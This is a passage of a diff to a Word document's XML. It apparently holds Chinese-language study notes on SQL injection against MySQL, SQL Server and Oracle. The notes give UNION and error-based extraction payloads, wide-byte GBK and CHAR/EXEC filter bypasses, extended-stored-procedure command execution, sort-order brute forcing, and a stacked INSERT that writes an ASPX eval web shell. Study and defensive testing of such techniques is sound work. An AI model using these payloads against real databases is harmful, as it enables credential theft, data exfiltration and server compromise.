+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在进行运算；</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>而</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>xyz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>”当做</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -797,91 +1520,29 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>处理）。如’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>1abc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>22</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>′，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>mysql</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>将“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>1abc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>”转成数字</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在进行运算；将“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>abc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>”当做</w:t>
+        <w:t>处理。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>小技巧</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：在注入时，使用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’str’^1^1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将字符串强制转换为</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -893,7 +1554,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>处理。</w:t>
+        <w:t>。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -904,6 +1565,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>数据库</w:t>
       </w:r>
       <w:r>
@@ -1189,7 +1851,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">and system_user&gt;0                   </w:t>
       </w:r>
       <w:r>
@@ -1663,6 +2324,7 @@
         <w:pStyle w:val="3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>U</w:t>
       </w:r>
       <w:r>
@@ -1911,7 +2573,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>拓展存储注入攻击：</w:t>
       </w:r>
     </w:p>
@@ -2453,7 +3114,11 @@
         <w:ind w:left="1680"/>
       </w:pPr>
       <w:r>
-        <w:t>;create table temp(dir nvarchar(255),depth varchar(255),files varchar(255),ID int NOT NULL IDENTITY(1,1));--</w:t>
+        <w:t xml:space="preserve">;create table temp(dir nvarchar(255),depth varchar(255),files varchar(255),ID </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>int NOT NULL IDENTITY(1,1));--</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2646,11 +3311,7 @@
         <w:ind w:left="1680"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">;insert into test(str)values ('&lt;%@ Page </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Language="Jscript"%&gt;&lt;%eval(Request.Item["test"],"unsafe");%&gt;')</w:t>
+        <w:t>;insert into test(str)values ('&lt;%@ Page Language="Jscript"%&gt;&lt;%eval(Request.Item["test"],"unsafe");%&gt;')</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3310,6 +3971,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -3528,14 +4190,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>表示表所</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>属的数据库名称；字段</w:t>
+        <w:t>表示表所属的数据库名称；字段</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3982,7 +4637,11 @@
         <w:ind w:firstLineChars="0"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()  </w:t>
+        <w:t xml:space="preserve">and 1=2 union select 1,group_concat(table_name),3,4 from </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">information_schema.tables where table_schema=database()  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4132,7 +4791,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>执行系统命令</w:t>
       </w:r>
     </w:p>
@@ -5500,7 +6158,17 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>每个进程中最大的连接数，包括持久连接。</w:t>
+              <w:t>每个进程中最大的连接数，包括持</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>久连接。</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5538,6 +6206,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>PHP_INI_SYSTEM</w:t>
             </w:r>
           </w:p>
@@ -6378,7 +7047,6 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>安全模式。</w:t>
             </w:r>
           </w:p>
@@ -6417,7 +7085,6 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>PHP_INI_ALL</w:t>
             </w:r>
           </w:p>
@@ -11517,6 +12184,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>mysql_list_fields()</w:t>
             </w:r>
           </w:p>
@@ -14593,6 +15261,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>MYSQL_CLIENT_SSL</w:t>
             </w:r>
           </w:p>
@@ -15378,7 +16047,6 @@
         <w:pStyle w:val="3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>PHP M</w:t>
       </w:r>
       <w:r>
@@ -15842,6 +16510,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>利用</w:t>
       </w:r>
       <w:r>
@@ -16016,7 +16685,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>and 1=2 union select null,null,(select table_name from user_tables where rownum=1 and table_name&lt;&gt;'</w:t>
       </w:r>
       <w:r>
@@ -16548,6 +17216,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>基于时间技术</w:t>
       </w:r>
     </w:p>
@@ -16744,7 +17413,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>有效的错误注入类型</w:t>
       </w:r>
     </w:p>
@@ -16846,9 +17514,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="840"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>这里主要收集的是第一步中</w:t>
@@ -17031,11 +17696,6 @@
                             </w:r>
                           </w:p>
                           <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:hint="eastAsia"/>
-                              </w:rPr>
-                            </w:pPr>
                             <w:r>
                               <w:t>SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a717071,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7170626b71,0x78))s), 844674407370955161</w:t>
                             </w:r>
@@ -17132,11 +17792,6 @@
                       </w:r>
                     </w:p>
                     <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:hint="eastAsia"/>
-                        </w:rPr>
-                      </w:pPr>
                       <w:r>
                         <w:t>SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a717071,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7170626b71,0x78))s), 844674407370955161</w:t>
                       </w:r>
@@ -17157,11 +17812,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:tab/>
       </w:r>
@@ -17172,13 +17822,7 @@
         <w:tab/>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -17666,6 +18310,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -19216,8 +19861,6 @@
                               </w:rPr>
                               <w:t>' at line 1</w:t>
                             </w:r>
-                            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-                            <w:bookmarkEnd w:id="0"/>
                           </w:p>
                         </w:txbxContent>
                       </wps:txbx>
@@ -19473,8 +20116,6 @@
                         </w:rPr>
                         <w:t>' at line 1</w:t>
                       </w:r>
-                      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-                      <w:bookmarkEnd w:id="1"/>
                     </w:p>
                   </w:txbxContent>
                 </v:textbox>
@@ -19493,7 +20134,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>报错类型汇总</w:t>
       </w:r>
     </w:p>
@@ -21195,6 +21835,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -21443,14 +22084,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>的扩展存储过程，可以通</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>过调用该存储过程来执行操作系统命令。</w:t>
+        <w:t>的扩展存储过程，可以通过调用该存储过程来执行操作系统命令。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22032,6 +22666,7 @@
         <w:ind w:firstLineChars="0"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>url</w:t>
       </w:r>
     </w:p>
@@ -22265,9 +22900,589 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>空白符编码绕过</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BEA83ED" wp14:editId="5ED3DF81">
+            <wp:extent cx="5274310" cy="2235835"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="4" name="图片 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId49"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2235835"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>宽字节</w:t>
+      </w:r>
+      <w:r>
+        <w:t>绕过办法：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:leftChars="200" w:left="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>该</w:t>
+      </w:r>
+      <w:r>
+        <w:t>办法是利用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>gbk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>编码</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中，部分中文</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>第二个字节是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’\x27’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>即</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’\\’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>以此来让</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”’”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>逃出</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:leftChars="200" w:left="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>服务</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>端代码</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>仍</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>不清楚。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:leftChars="200" w:left="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>錦</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’\xe5\x27’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:leftChars="200" w:left="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>誠</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’\xd5\x27’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:leftChars="200" w:left="420"/>
+      </w:pPr>
+      <w:r>
+        <w:t>’\xbf\x27’</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="2"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>使用动态的查询执行</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>动态执行</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>SQLServer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中，可以使用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>EXEC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>函数以字符串方式执行查询。如</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>EXEC(‘SELECT password FROM users’)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>2.CHAR</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>函数</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>该办法可以绕过对引号的过滤</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7820FF6B" wp14:editId="24F39A9E">
+            <wp:extent cx="4737100" cy="1511300"/>
+            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
+            <wp:docPr id="2" name="图片 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId50">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4737100" cy="1511300"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>暴力破解</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>通过排序变化实现暴力破解</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>通过对目标列的排序，可以实现对目标列</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>值</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的暴力破解</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="5003800" cy="1404620"/>
+                <wp:effectExtent l="0" t="0" r="25400" b="17780"/>
+                <wp:docPr id="10" name="文本框 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5003800" cy="1404620"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:t xml:space="preserve">select * from table where username=’xx’ union select 1,2,0x5346… order by 3 desc </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve">-- </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>mysql</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>语句（字符</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:hint="eastAsia"/>
+                              </w:rPr>
+                              <w:t>拼接</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>）</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="_x0000_s1032" type="#_x0000_t202" style="width:394pt;height:110.6pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox style="mso-fit-shape-to-text:t">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:t xml:space="preserve">select * from table where username=’xx’ union select 1,2,0x5346… order by 3 desc </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t xml:space="preserve">-- </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>mysql</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>语句（字符</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:hint="eastAsia"/>
+                        </w:rPr>
